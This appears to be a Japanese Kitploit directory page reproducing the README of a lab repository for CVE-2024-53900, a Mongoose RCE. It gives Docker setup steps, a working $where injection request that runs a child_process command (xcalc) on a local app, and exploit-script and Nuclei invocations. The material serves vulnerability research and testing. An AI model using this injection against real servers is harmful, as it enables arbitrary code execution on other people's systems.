Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-53900 — CVE-2024-53900(populate().match $where を介した Mongoose の重大な RCE)の再現可能な環境と PoC。セキュリティテスト用の自動エクスプロイトスクリプトと Nuclei テンプレートが含まれています。 | Kitploit
ツール/GitHubGitHub/www-spam/cve-2024-53900
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubwww-spam/cve-2024-53900

CVE-2024-53900

CVE-2024-53900(populate().match $where を介した Mongoose の重大な RCE)の再現可能な環境と PoC。セキュリティテスト用の自動エクスプロイトスクリプトと Nuclei テンプレートが含まれています。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-53900 - Mongoose populate().match $where RCE

このリポジトリは、CVE-2024-53900 の再現可能な脆弱性環境と PoC を提供します。これは、Mongoose < 8.8.3 の重大なリモートコード実行(RCE)脆弱性です。


📌 脆弱性の詳細

  • CVE: CVE-2024-53900
  • 影響を受けるバージョン: Mongoose < 8.8.3
  • 深刻度: 緊急 (CVSS 9.1)
  • 攻撃ベクトル: populate().match と $where の組み合わせ
  • 影響: Node.js コンテキストでの任意の JavaScript 実行(RCE)

参照:

  • GitHub アドバイザリ
  • 修正コミット

🛠️ セットアップ手順

1. リポジトリのクローン

root@kitploit:~
git clone https://github.com/www-spam/CVE-2024-53900.git cd CVE-2024-53900

2. 環境の起動(Docker Compose)

root@kitploit:~
docker-compose up -d

📌 GUI PoC(電卓)

デフォルトでは、脆弱な Node.js アプリは Docker 内で実行されます。
ただし、GUI アプリケーション(xcalc や gnome-calculator など)はコンテナ内では起動しません。

👉 電卓ウィンドウを起動して RCE をデモしたい場合は、次の手順を行います:

  1. MongoDB を Docker で実行する(DB バックエンドとして)

    root@kitploit:~
    docker run -d --name mongo -p 27017:27017 mongo:6
    
  2. 脆弱な Node.js アプリをローカルで実行する

root@kitploit:~
   cd ~/cve-2024/app
   npm install
   node server.js
  • MongoDB はポート 27017 で実行されます
  • 脆弱な Node.js アプリはポート 5000 で実行されます

📂 ディレクトリ構成

root@kitploit:~
/home/kali/cve-2024/
├── docker-compose.yml     # Environment setup
├── exploit.py             # Automated exploit script
├── CVE-2024-53900.yaml    # Nuclei template
├── README.md              # Documentation
├── app/                   # Vulnerable Node.js app
│   ├── Dockerfile
│   ├── package.json
│   ├── server.js
│   ├── models.js
│   └── views/
└── data/                  # MongoDB volume

🚀 エクスプロイト

手動テスト

root@kitploit:~
curl "http://localhost:5000/book/{OBJECT_ID}/detail?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('xcalc')"

自動 PoC

root@kitploit:~
python3 exploit.py --url http://localhost:5000

Nuclei を使用する

root@kitploit:~
nuclei \ -u http://localhost:5000/book/{{OBJECT_ID}/detail \ -t ~/.local/nuclei-templates/CVE-2024-53900.yaml \ -var pfield=author
画像

🔒 セキュリティ上の注意

  • 研究およびテスト専用(本番環境用ではありません)。
  • ペイロードは安全な操作(例: ファイル作成)に制限されています。
  • Docker を使用して完全に分離されています。

✅ テスト済み環境

  • OS: Kali Linux
  • MongoDB: mongo:6
  • Node.js: 18
  • Mongoose: 8.5.0(脆弱性あり)
  • Express: 4.18.2

📸 デモ

画像
ツールをダウンロード